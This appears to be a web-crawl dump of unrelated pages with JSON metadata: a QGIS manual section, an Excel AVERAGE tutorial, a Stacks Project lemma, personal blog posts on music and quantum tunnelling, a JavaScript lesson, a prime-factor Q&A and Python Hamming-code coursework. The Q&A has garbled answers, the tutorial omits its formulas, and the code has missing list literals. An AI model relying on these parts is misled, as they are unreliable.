[ null, "https://d1avenlh0i1xmr.cloudfront.net/4eab09bd-754a-4af1-b375-6efb0a39c29e/slide24.jpg", null, "https://d1avenlh0i1xmr.cloudfront.net/d743eae8-98f4-4433-917a-5de303f9d1da/slide25.jpg", null, "https://www.teachoo.com/static/misc/Davneet_Singh.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8951429,"math_prob":0.6894768,"size":952,"snap":"2023-14-2023-23","text_gpt3_token_len":286,"char_repetition_ratio":0.14873418,"word_repetition_ratio":0.18539326,"special_character_ratio":0.3119748,"punctuation_ratio":0.043956045,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96531874,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,5,null,5,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-06-04T13:15:40Z\",\"WARC-Record-ID\":\"<urn:uuid:5045ad2e-5511-4332-997f-2cfd7c3a5c7c>\",\"Content-Length\":\"161414\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1d805a59-4f7a-4f49-a889-68427c4a8153>\",\"WARC-Concurrent-To\":\"<urn:uuid:17f09358-6e44-43ea-a0e2-1acb60c3695f>\",\"WARC-IP-Address\":\"104.21.90.10\",\"WARC-Target-URI\":\"https://www.teachoo.com/8418/2137/Example-6/category/Examples/\",\"WARC-Payload-Digest\":\"sha1:XNPJN3YUATB5TDYFHYNLQIP3I577ETDL\",\"WARC-Block-Digest\":\"sha1:O2W2ZJL5K4ZQFLTTA2CLCNLH2X32SBN5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-23/CC-MAIN-2023-23_segments_1685224649986.95_warc_CC-MAIN-20230604125132-20230604155132-00671.warc.gz\"}"}
https://semiautomaticclassificationmanual.readthedocs.io/en/latest/neighborPixelsTab.html
[ "# 3.4.3.11. Neighbor pixels¶\n\nThis tool allows for the calculation of several neighbor pixels statistics for every band of a band set defined in the Band set.\n\nThe statistics are calculated for every pixel of the input raster considering the values of the neighbor pixels. Neighbor pixels are defined through a distance or through a custom matrix.\n\nFor example, the following matrix represents the neighbor pixels within a distance of 1 pixel from a central pixel, resulting in a 3x3 matrix.\n\n Neighbor Neighbor Neighbor Neighbor Center Neighbor Neighbor Neighbor Neighbor\n\nSeveral statistics are available. The statistic Sum will result in a raster convolution. For instance, this can be useful to apply an image filter to all the bands a band set for photointerpretation.\n\nAn output band is created for every band in the band sets.\n\n## 3.4.3.11.1. Neighbor pixels¶\n\nResulting in the following matrix:\n\n NoData 1 NoData 1 1 1 NoData 1 NoData" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80395603,"math_prob":0.9853156,"size":2255,"snap":"2022-27-2022-33","text_gpt3_token_len":543,"char_repetition_ratio":0.14526877,"word_repetition_ratio":0.010666667,"special_character_ratio":0.22616407,"punctuation_ratio":0.16122004,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99082077,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-07-05T13:41:24Z\",\"WARC-Record-ID\":\"<urn:uuid:86f7df20-4c57-41dd-ba73-919843bf7667>\",\"Content-Length\":\"18217\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:820398a7-3f32-4900-93da-d5d60f84a1e2>\",\"WARC-Concurrent-To\":\"<urn:uuid:d71b5c37-03dc-4809-95cd-7f9cbb853e6e>\",\"WARC-IP-Address\":\"104.17.32.82\",\"WARC-Target-URI\":\"https://semiautomaticclassificationmanual.readthedocs.io/en/latest/neighborPixelsTab.html\",\"WARC-Payload-Digest\":\"sha1:NXQDKXD3UBU62VW7OJQBCBPBY2IPR3GY\",\"WARC-Block-Digest\":\"sha1:BIGNC3XM2SUH2HZDGPU5H3BXAK5FBVVY\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656104576719.83_warc_CC-MAIN-20220705113756-20220705143756-00001.warc.gz\"}"}
https://www.wps.com/academy/how-to-use-average-function-in-excel-on-mac-quick-tutorials-1864502/
[ "# How to use average function in excel on mac\n\nJuly 26, 2022\n624 Views\n0\n\nA free Office suite fully compatible with Microsoft Office\n\nThe average (arithmetic mean) of a set of numbers is determined by Excel's AVERAGE function. The AVERAGE function disregards logical values, blank cells, and text-filled cells.\n\nThe Excel Statistical functions section includes the AVERAGE Function. In Excel, it will return the mean value of the supplied set of numbers. In Excel, the function is used to determine the arithmetic mean of a set of inputs. This tutorial will walk you through each step of computing the average in Excel. The function is helpful to a financial analyst in determining the average (mean) of a set of statistics. For instance, we can discover the average revenue for a company over the previous 12 months.\n\nAverage function in excel online, 2016 and 2019\n\nUse SUM and COUNT instead of the AVERAGE function.\n\nThe AVERAGE function, for instance, determines the average of the values in cells A1 through A3 in the example below.\n\n1.The same outcome is obtained using the formula below.\n\n2.The average of the values in cells A1 through A3 and the number 8 is determined by the following AVERAGE function.\n\n3.The AVERAGE function disregards text-filled cells, empty cells, and logical values (TRUE or FALSE).\n\nAverageA function in excel\n\n1.The average (arithmetic mean) of a set of numbers is another result of the AVERAGEA function. However, the logical value TRUE evaluates to 1 while the logical values FALSE and cells with text evaluate to 0. Additionally ignoring empty cells is the AVERAGEA function.Look at the AVERAGEA function below as an illustration.\n\n2.You can verify this outcome using the standard AVERAGE function.\n\nAverage top 3 in excel\n\n1.To determine the average of the top 3 figures in a data set, use Excel's AVERAGE and LARGE functions.The first step is to determine the average of the values in cells A1 through A6 using the AVERAGE function below.\n\n2.Use the LARGE function, for instance, to determine the third-largest number.\n\n3.The average of the top three numbers is calculated using the formula below.\n\n4.The array constant 20,15,10 is returned by the LARGE function, as explained. The AVERAGE function receives this array constant as an argument, returning a value of 15.\n\nAverage If function in excel\n\n1.Use Excel's AVERAGEIF function to determine the average of all cells that satisfy a particular criterion.\n\nNote: This above written article is an attempt to show you how to use average function in excel online, 2016 and 2019, in both windows and mac.You just need to have a little understanding of how and which way things work and you are good to go. With having this basic knowledge or information of how to use it, you can also access and use different other options on excel or spreadsheet. Also, it is very similar to Word or Document. So, in a way, if you learn one thing, like Excel, you can automatically learn how to use Word as well because both of them are very similar in so many ways. If you want to know more about WPS Office, you can download WPS Office to access, Word, Excel, PowerPoint for free." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.86942834,"math_prob":0.8835786,"size":3489,"snap":"2022-40-2023-06","text_gpt3_token_len":777,"char_repetition_ratio":0.17360115,"word_repetition_ratio":0.062809914,"special_character_ratio":0.22098023,"punctuation_ratio":0.11522049,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9958245,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T17:03:43Z\",\"WARC-Record-ID\":\"<urn:uuid:acc617b1-a3f9-4aad-bdf5-e7e859708b17>\",\"Content-Length\":\"122142\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:63517318-abd4-4dd3-9b18-c4015f9b319e>\",\"WARC-Concurrent-To\":\"<urn:uuid:2c114422-9dbd-4871-9136-c30e3dc51f3a>\",\"WARC-IP-Address\":\"108.138.85.7\",\"WARC-Target-URI\":\"https://www.wps.com/academy/how-to-use-average-function-in-excel-on-mac-quick-tutorials-1864502/\",\"WARC-Payload-Digest\":\"sha1:ZJZ4OYZKJSM6O2CUBMWGKGEDKMMRTVD2\",\"WARC-Block-Digest\":\"sha1:ET3DTCKHGWZUMGMBS4VZ767PIZB2ACE4\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499888.62_warc_CC-MAIN-20230131154832-20230131184832-00057.warc.gz\"}"}
https://stacks.math.columbia.edu/tag/005Z
[ "For Jacobson spaces, closed points see everything about the topology.\n\nLemma 5.18.7. Suppose $X$ is a Jacobson topological space. Let $X_0$ be the set of closed points of $X$. There is a bijective, inclusion preserving correspondence\n\n$\\{ \\text{finite unions loc.\\ closed subsets of } X\\} \\leftrightarrow \\{ \\text{finite unions loc.\\ closed subsets of } X_0\\}$\n\ngiven by $E \\mapsto E \\cap X_0$. This correspondence preserves the subsets of locally closed, of open and of closed subsets.\n\nProof. We just prove that the correspondence $E \\mapsto E \\cap X_0$ is injective. Indeed if $E\\neq E'$ then without loss of generality $E\\setminus E'$ is nonempty, and it is a finite union of locally closed sets (details omitted). As $X$ is Jacobson, we see that $(E \\setminus E') \\cap X_0 = E \\cap X_0 \\setminus E' \\cap X_0$ is not empty. $\\square$\n\n## Comments (2)\n\nComment #1117 by Simon Pepin Lehalleur on\n\nSuggested slogan: For Jacobson spaces, closed points see everything about the topology.\n\nComment #6241 by Matthieu Romagny on\n\nIn the two bracketted sets of the statement, the backslashes are visible but they shouldn't be, I guess ?\n\nThere are also:\n\n• 8 comment(s) on Section 5.18: Jacobson spaces\n\n## Post a comment\n\nYour email address will not be published. Required fields are marked.\n\nIn your comment you can use Markdown and LaTeX style mathematics (enclose it like $\\pi$). A preview option is available if you wish to see how it works out (just click on the eye in the toolbar).\n\nUnfortunately JavaScript is disabled in your browser, so the comment preview function will not work.\n\nAll contributions are licensed under the GNU Free Documentation License.\n\nIn order to prevent bots from posting comments, we would like you to prove that you are human. You can do this by filling in the name of the current tag in the following input field. As a reminder, this is tag 005Z. Beware of the difference between the letter 'O' and the digit '0'." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.828191,"math_prob":0.7573987,"size":945,"snap":"2021-21-2021-25","text_gpt3_token_len":273,"char_repetition_ratio":0.12221041,"word_repetition_ratio":0.051612902,"special_character_ratio":0.2867725,"punctuation_ratio":0.11235955,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96800345,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-06-25T07:20:49Z\",\"WARC-Record-ID\":\"<urn:uuid:0f9f526f-cbd7-44a1-a4bd-ffde665c14b2>\",\"Content-Length\":\"15666\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0736d489-acd7-4569-a9c4-5a5596432a65>\",\"WARC-Concurrent-To\":\"<urn:uuid:bb2aeb65-937e-4962-a364-9a9e94d4dea6>\",\"WARC-IP-Address\":\"128.59.222.85\",\"WARC-Target-URI\":\"https://stacks.math.columbia.edu/tag/005Z\",\"WARC-Payload-Digest\":\"sha1:NFKKQMBBJRZAA7TJMUBAQGB7BFIKFTYJ\",\"WARC-Block-Digest\":\"sha1:2TVYBFCHYKMH5HRCLD35SZRSX6KYYECE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-25/CC-MAIN-2021-25_segments_1623487622113.11_warc_CC-MAIN-20210625054501-20210625084501-00524.warc.gz\"}"}
https://marty-green.blogspot.com/2015/
[ "## Thursday, June 25, 2015\n\n### Polish Guy Singing \"Crazy\"\n\nJacek (that's YAH-tsek, but you can call him Jack) is a friend of mine who takes part in a Thursday evening rehearsal session downtown that I lead at a program called ArtBeat. I think this is a phenomenal version of Crazy, the Patsy Cline signature song. (Not everyone knows that Willie Nelson wrote it.) I helped a little with the arrangement on this, but despite our best efforts the two patch changes on the instrumental solo were kind of surprising to us (as you might be able to tell from Jacek's facial expression.)\n\nIf you like this video, pass it on to your friends.\n\n## Saturday, April 4, 2015\n\n### I. L. Peretz 100th Yohrzeit\n\nToday is the 100th anniversary of the death of Yiddish writer I. L. Peretz. They say that a hundred thousand people thronged the streets of Warsaw for his funeral.\n\nPeretz was, in his best moments, a genius without parallel in the Yiddish world. I've had a personal role in trying to keep Peretz's work alive. It's brilliant work and it's actually important if you care at all about who you are and where you came from. Of course, not everyone sees it that way. In fact, my work hasn't been much appreciated in the Jewish world. But at least I've done something.\n\nMy biggest project was my musical setting of Peretz's epic poem \"The Ballad of Monsich\". You can see it on Youtube here:\n\nThis was taken from the Winnipeg Fringe Festival in 2005, and there's actually eleven videos. This is the first one, but if you want the whole playlist, it should link from here.\n\nBut I almost forgot one other project I did, which was an incredibly chilling poem about power and hypocrisy called Solomon's Throne, which still rings true today. It was never published anywhere, and so I thought it would be fitting on this, the 100th anniversary of Peretz's death, to post it on the internet. You can link to the PDF here: it includes the transcribed Yiddish (using German spelling) side-by-side with the English translation.  I'm going to say without modesty that my translation is pretty f#%\\$ing brilliant.\n\n## Tuesday, February 3, 2015\n\n### Penetrating the Barrier: Some Calculations\n\nYesterday I calculated the difference between the two ground states of the double well (the infinte well with a finite barrier in the middle.) The two states were of course the symmetric and the antisymmetric cases, with the antisymmetric having a slightly higher energy:\n\nI picked a wavelength of 44 angstroms (7 angstroms = 1 radian) for the sine wave, and a decay length of 2 angstroms for the exponential region, so the ration of the two parameters was 7:2. And then I picked the dimensions of the box so that the waves would just fit inside. And that's pretty much all you need to do the calculation. The Wikipedia formula asks you to calculate the transmission coefficient in terms of E and V, the energies in the two zones respectively, but the formula they give is a bit redundant...you can re-express it just in terms of the ratio (7:2 in this case) of the two characteristic lengths:\nYou can see I've got r = 7/2, and ka = 4, so plugging in the numbers, we get a transmission coefficient of 1/2483, or close to 0.04%.   Is this the same as I got using the steady state solutions?\n\nYesterday I calculated that the wavelengths of the symmetric and antisymmetric modes were different by 0.4% (about one part in 250). But in quantum mechanics wavelength is momentum, and energy is frequency (momentum squared). So the frequencies are different by one part in 125.\n\nHere is where it gets interesting. You start out with the electron all on one side of the barrier. How do you do that? By having the symmetric and antisymmetric modes in phase so they re-inforce on the left and cancel on the right. After 125 cycles, they will be back in phase again. But after 62.5 cycles, the relative phases will be reversed...so all the wave function will be on the right hand side.\n\nIs this the same result as we got from the Wikipedia formula? It's hard to say, because the Wikipedia formula is expressed in terms of the Copenhagen interpretation as the \"probability\" of a particle getting through the barrier. Where is my \"particle\" in terms of standing waves?\n\nWell, one way to interpret it would be to imagine the particle bouncing back and forth in the potential well. If it bounces once on each cycle, that means after hitting the wall 62 times, it gets completely through to the other side. That's like a 1.5% penetration on each cycle...more like 3% or 4%, actually, because there's the competing probability of it returning from whence it came. That's a lot more than the Wikipedia calculation. Have we done something wrong?\n\nIt's actually not quite that bad. Remember in quantum mechanics there's a discrepancy between the phase velocity and the group velocity. For electrons, the group velocity is twice the phase velocity. We've been treating the electron as though it travels with the phase velocity of the wave function...it's actually twice that, so where we thought it was hitting the wall 62.5 times, it was actually 125 times. So our nominal penetration ration goes down by half, to below one percent. That's a little better, but still a long way off. What gives?\n\nThere is a fascinating answer to this question, and it gives us a very deep insight into the whole subject of quantum resonance. We said that each time an electron strikes the barrier, it has a 1/2500 chance of getting through. But what does this mean in terms of the wave function? It means the amplitude of the transmitted function is one fiftieth. The power goes as the amplitude squared.\n\nIn the coupled well system, the transmitted wave is in phase each time it re-strikes. So the amplitude on the transmitted side goes as one fiftieth, two fiftieths, three fiftieths, etc. After only fifty strikes, it is 100 percent through!\n\nNot exactly....because once the amplitude starts building up on the right hand side, there is the probability that it will come back through the other way. But early in the game, that probability is negligible. So while the amplitude is growing as 1/50, 2/50, 3/50....   the probability is growing as 1/2500, 4/2500, 9/2500... in other words, it is growing parabolically.\n\nHow close does this parabola fit to the sine wave which represents the oscillating probability? Pretty close, as it turns out. I'm not going to do it in detail, but if you look at the Taylor Expansion for the cosine function, the x-squared term projects to -1 at when x = 1.41 radians (the square root of two. On our sine wave, where 125 strikes (the electron striking the wall) makes is a half-cycle, that comes to 56 strikes.\n\nIt's pretty close.\n\n### Quantum Tunneling: A Different KInd of Calculation\n\nI did some interesting physics yesterday so I thought I should write it up. The question was about quantum tunneling. It came from my friend's 3rd year Physical Electronics course in Electrical Engineering. You had a MosFET with a silicon dioxide insulating layer between the gate and the channel. They gave you the the barrier potential in the insulator, and told you to assume an electron with a certain energy (less than the barrier potential) in the gate. What was the \"probability\" or rate of tunneling?\n\nThis is a pretty standard problem which you can look up on Wikipedia. You calculate the form of the free-electron solutions in all three regions and match up the boundary condition. It's a little messy but it works.\n\nI thought I could do better. The problem is messy because the conditions are different on the left and right hand sides. So I came up with the idea of working with symmetries. Instead of taking a freely propagating wave from the left and following it through the barrier, I put the whole thing inside a bigger potential well and considered the steady state solutions. Of course there are two minimum-energy solutions: the symmetric and the anti-symmetric, separated by a very tiny energy difference.\n\nI don't like to carry too many letter symbols so I picked numbers that would come out nicely. From the terms of the problem, it's easy to calculate the free-propagation constants in both regions. So I allowed myself to tweak the problem parameters so the propagation constants come out to nice integers. Assuming pi = 22/7, here is the problem as I set it up:\n\nYou see I gave the well a width of 20 (you can call it 20 Angstroms if you like or 20 millimeters, it won't matter in the end...it's all about the geometry.) Can you see why this fits the sine wave perfectly? It's because the wave penetrates into the barrier. I've assumed that the penetration length is 2, so 20+2=22 and everything fits. The anti-symmetric solution is the same basic idea:\n\nYou can see I set it up so that there is a wavelength of 44, which fits perfectly into the box. But actually that's a bit of a cheat. If I were matching up a sine wave to an exponential at the boundary, then I would indeed get a wavelength of exactly 44, because of the well-known property of an exponential whereby the projection of the slope intersects the x-axis at exactly the decay length (I'm also assuming the sine wave is in the small-angle regime where sin(x)=x):\n\nI don't really care about the constant in front of the sine wave, but I just threw it in here to show that it's easy. I used the property of sine waves that the projection of the tangent from the zero-crossing reaches the altitude of the sine wave after one radian. The point is that if I'm matching my sine wave (period = 44) to an exponential (decay length = 2) then this is how they line up. Everything fits.\n\nExcept I'm not exactly matching the sine wave to an exponential. I'm matching it to cosh (in the symmetric case) and sinh (in the antisymmetric case. Cosh is just a little higher and a little less steep...so it matches the sine wave at a slightly different position. Actually...the only way to match it up is to make the sine wave just a little bit longer. Instead of a half-length of 22 angstroms, the sine wave stretches to around 22.04....close to 0.2%, if you like. Similarly, in the anti-symmetric solution, the sine wave has to be shortened by the same amount. So the anti-symmetric solution has a slightly higher frequency than the symmetric solution.\n\nWe'll see what the implications of this are when we come back.\n\nOh...how did I calculate the 0.04 angstroms? That's the beauty of this method...it's pure geometry, just looking at the ration of the function with its derivative on both sides of the boundary, and using the small-angle approximation tan(x) = x. It falls right out." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.94494665,"math_prob":0.8746714,"size":4513,"snap":"2021-31-2021-39","text_gpt3_token_len":1036,"char_repetition_ratio":0.1060102,"word_repetition_ratio":0.0025477707,"special_character_ratio":0.2326612,"punctuation_ratio":0.12968917,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9714342,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-07-29T22:49:24Z\",\"WARC-Record-ID\":\"<urn:uuid:ef550522-1f4e-4d95-8ef6-159d0be09e3c>\",\"Content-Length\":\"70013\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:3b8e7353-f075-42f4-a277-fff9f3644b83>\",\"WARC-Concurrent-To\":\"<urn:uuid:6c32d3df-0f4c-48d2-afdd-7ff0d271a51d>\",\"WARC-IP-Address\":\"172.217.2.97\",\"WARC-Target-URI\":\"https://marty-green.blogspot.com/2015/\",\"WARC-Payload-Digest\":\"sha1:IYLUOWS5QJ3UURZYESWCXXRYS7EMQXO7\",\"WARC-Block-Digest\":\"sha1:PIDZ7C2VGNA2CZIRVKH4UMBNPRRMADNE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046153897.89_warc_CC-MAIN-20210729203133-20210729233133-00474.warc.gz\"}"}
https://code.mu/en/javascript/book/prime/basis/negative-numbers/
[ "", null, "# Negative numbers in JavaScript\n\nNumbers can be negative. To do this, put a minus sign before the number:\n\n```let a = -1; alert(a); // shows -1```\n\nA minus sign can be written to both numbers and variables:\n\n```let a = 1; let b = -a; // the contents of a with the opposite sign is written to b alert(b); // shows -1```\n\nИли вот так:\n\n```let a = 1; alert(-a); // shows -1```\n\nCreate the variable `a` with the value `-100`. Display this value on the screen.\n\nCreate the variable `a`, write some positive or negative number to it. Display this value with the opposite sign on the screen.\n\n## Plus sign before variables\n\nJust as negative numbers are preceded by the \"minus\" sign, positive numbers can be preceded by the \"plus\" sign.\n\nIn fact, this plus does nothing, but it is quite valid, see an example:\n\n```let a = +1; alert(a); // shows 1```" ]
[ null, "https://code.mu/en/javascript/book/prime/basis/negative-numbers/", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.80263615,"math_prob":0.9948423,"size":764,"snap":"2022-40-2023-06","text_gpt3_token_len":206,"char_repetition_ratio":0.13815789,"word_repetition_ratio":0.0,"special_character_ratio":0.28795812,"punctuation_ratio":0.147929,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9857652,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-26T19:08:31Z\",\"WARC-Record-ID\":\"<urn:uuid:b7ae51af-c500-495f-8cc1-7b0fbc18e23e>\",\"Content-Length\":\"4399\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dea94b45-7e20-4ee2-ab15-048b3ea0bac7>\",\"WARC-Concurrent-To\":\"<urn:uuid:0d4b7694-940e-4f57-bc68-e70b4588b7d1>\",\"WARC-IP-Address\":\"93.125.99.98\",\"WARC-Target-URI\":\"https://code.mu/en/javascript/book/prime/basis/negative-numbers/\",\"WARC-Payload-Digest\":\"sha1:XJQBWRLTHW5N47L2OXXBYACB47YTGUOX\",\"WARC-Block-Digest\":\"sha1:6BQS7XPLE6BJ6YADVRKPGNO4DUGRCMBW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334915.59_warc_CC-MAIN-20220926175816-20220926205816-00072.warc.gz\"}"}
https://oysterstreetpottery.com/qa/quick-answer-what-are-the-prime-factors-of-490.html
[ "", null, "# Quick Answer: What Are The Prime Factors Of 490?\n\n## What are the prime factors of 120?\n\nFactors of 120: 1, 2, 3, 4, 5, 6, 8, 10, 12, 15, 20, 24, 30, 40, 60, 120.\n\nPrime factorization: 120 = 2 x 2 x 2 x 3 x 5, which can also be written 120 = 2³ x 3 x 5..\n\n## What is the prime factor of 625?\n\nThe prime factorization of 625 is 5 x 5 x 5 x 5 = 54. To solve this, we use a factor tree.\n\n## What are the prime factors of 27?\n\n27 is a composite number. 27 = 1 x 27, or 3 x 9. Factors of 27: 1, 3, 9, 27. Prime factorization: 27 = 3 x 3 x 3, which can also be written 27 = 3³.\n\n## What is the prime factorization of 44?\n\n44 is a composite number. 44 = 1 x 44, 2 x 22, or 4 x 11. Factors of 44: 1, 2, 4, 11, 22, 44. Prime factorization: 44 = 2 x 2 x 11, which can also be written 2² x 11.\n\n## What is the prime factor of 700?\n\nThe prime factorization of 700 is 5 x 2 x 2 x 5 x 7.\n\n## What are the prime factors of 588?\n\n588 is a composite number.Prime factorization: 588 = 2 x 2 x 3 x 7 x 7, which can be written 588 = (2^2) x 3 x (7^2)The exponents in the prime factorization are 2, 1 and 2. … Factors of 588: 1, 2, 3, 4, 6, 7, 12, 14, 21, 28, 42, 49, 84, 98, 147, 196, 294, 588.More items…•\n\n## What are the prime factors of 200?\n\nThe prime factorization of 200 is as follows: 200 = 2 × 2 × 2 × 5 × 5.\n\n## What are the prime factors of 40?\n\nThe prime factorization of 40 is 2 × 2 × 2 × 5, or 23 × 5.\n\n## What is the factor of 10?\n\nThe factors of 10 are 1, 2, 5, and 10. You can also look at this the other way around: if you can multiply two whole numbers to create a third number, those two numbers are factors of the third. 2 x 5 = 10, so 2 and 5 are factors of 10. 1 x 10 = 10, so 1 and 10 are also factors of 10.\n\n## What are the prime factors of 384?\n\n384 and Level 6384 is a composite number.Prime factorization: 384 = 2 x 2 x 2 x 2 x 2 x 2 x 2 x 3, which can be written 384 = (2^7) x 3.The exponents in the prime factorization are 7 and 1. … Factors of 384: 1, 2, 3, 4, 6, 8, 12, 16, 24, 32, 48, 64, 96, 128, 192, 384.More items…•\n\n## What are the prime factors of 30?\n\nFactors of 30: 1, 2, 3, 5, 6, 10, 15, 30. Prime factorization: 30 = 2 x 3 x 5.\n\n## What are the prime factors of 72?\n\nSo, the prime factorisation of 72 are 2 × 2 × 2 × 3 × 3 or 23 × 32, where 2 and 3 are the prime numbers.\n\n## What is the sum of all positive prime factors of 2020?\n\nAnswer Expert Verified. The sum of its prime factors is 110.\n\n## What is the prime factorization of 490?\n\nThe prime factorization of 490 = 2•5•72.\n\n## What are the prime factors of 420?\n\n420 Factor Trees420 is a composite number.Prime factorization: 420 = 2 x 2 x 3 x 5 x 7, which can be written 420 = (2^2) x 3 x 5 x 7.The exponents in the prime factorization are 2, 1, 1, and 1. … Factors of 420: 1, 2, 3, 4, 5, 6, 7, 10, 12, 14, 15, 20, 21, 28, 30, 35, 42, 60, 70, 84, 105, 140, 210, 420.More items…•\n\n## What are the prime factors of 168?\n\nAgain, all the prime numbers you used to divide above are the Prime Factors of 168. Thus, the Prime Factors of 168 are: 2, 2, 2, 3, 7.\n\n## What are the prime factors of 70?\n\nSo, the prime factors of 70 are written as 2 x 5 x 7, where 2, 5 and 7 are the prime numbers. It is possible to find the exact number of factors of a number 70 with the help of prime factorisation. The prime factor of the 70 is 2 x 5 x 7.\n\n## What are the prime factors of 28?\n\n2 Answers. The prime factorization of 28 is 22⋅7 .\n\n## What are the prime factors of 450?\n\nThe prime factorization of 450 is 2 × 3 × 3 × 5 × 5. Written with exponents, the answer is 2 × 32 × 52.\n\n## What are the prime factors of 1050?\n\n1050 Factor Trees Are In Bloom This Spring1050 is a composite number.Prime factorization: 1050 = 2 × 3 × 5 × 5 × 7, which can be written 1050 = 2 × 3 × 5² × 7.The exponents in the prime factorization are 1, 1, 2, and 1.More items…•\n\n## What is the factors of 169?\n\n507 and Level 6. 2015-05-30 / Leave a comment. 507 cannot be evenly divided by 4 or 9, but to simplify its square root, I would still make a little cake: √507 = (√169)(√3) = 13√3. … 169 and Level 2. 2014-07-08 / Leave a comment. 169 is a composite number and a perfect square. Factor pairs: 169 = 1 x 169 or 13 x 13." ]
[ null, "https://mc.yandex.ru/watch/66666868", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9164327,"math_prob":0.998745,"size":4795,"snap":"2020-45-2020-50","text_gpt3_token_len":1765,"char_repetition_ratio":0.34460446,"word_repetition_ratio":0.22242817,"special_character_ratio":0.43274245,"punctuation_ratio":0.19025157,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9992586,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-31T12:48:53Z\",\"WARC-Record-ID\":\"<urn:uuid:a0ed75c3-0be8-4398-9698-6f6e3b05d275>\",\"Content-Length\":\"40438\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:84845416-3b89-4fb8-88c0-aa9360a7b105>\",\"WARC-Concurrent-To\":\"<urn:uuid:ad7693ae-fef5-4e8b-9935-6084b232c3a1>\",\"WARC-IP-Address\":\"87.236.16.235\",\"WARC-Target-URI\":\"https://oysterstreetpottery.com/qa/quick-answer-what-are-the-prime-factors-of-490.html\",\"WARC-Payload-Digest\":\"sha1:2HQ5LN76GBGLKOLL52AFO2GCR43FSLGP\",\"WARC-Block-Digest\":\"sha1:QTNNX6NCZWIQOAYJ7JLNVGDT3J62XTOO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107918164.98_warc_CC-MAIN-20201031121940-20201031151940-00425.warc.gz\"}"}
https://samrobbins.uk/portfolio/error-correcting-codes/
[ "# Error Correcting Codes\n\nImplementing a range of algorithms for error correcting codes\n\nFeb 15, 2019\n\n2 minutes\n\n## Built with\n\nIn this coursework I implemented a range of functions for different methods of error correcting codes\n\n## Hamming codes\n\n### Message\n\nThis function takes a vector and converted it to a message that can be used in a hamming code\n\ndef message(a):\nif not checkvalid(a):\nreturn []\nl = len(a)\nr = 2\nwhile (2 ** r - 2 * r - 1) < l:\nr += 1\nk = 2 ** r - r - 1\nlength = list(bin(l)[2:])\nlength = [int(x) for x in length]\nlength = * (r - len(length)) + length\nend = * (k - r - l)\nreturn length + a + end\n\n\n### Hamming Encoder\n\nThis acts as an encoder for hamming codes\n\ndef hammingEncoder(m):\nif not checkvalid(m):\nreturn []\nl = len(m)\nr = 2\n# Ensuring that the list is of the correct length\nwhile 2 ** r - r - 1 < l:\nr += 1\n# If not return an empty list\nif 2 ** r - r - 1 != l:\nreturn []\n# Turn the two lists into numpy arrays so they can be multiplied\nmessage = np.array(m)\nmatrix = np.array(hammingGeneratorMatrix(r))\n# Multiply the message by the hamming generator matrix mod 2 and turn it back to a python list\nreturn (message.dot(matrix) % 2).tolist()\n\n\n### Hamming decoder\n\nThis acts as a decoder for hamming codes\n\ndef hammingDecoder(v):\nif not checkvalid(v):\nreturn []\nr = math.log(len(v) + 1, 2)\n\nif not r.is_integer():\nreturn []\nr = int(r)\nmatrix = []\n# Create the parity check matrix\nfor i in range(1, 2 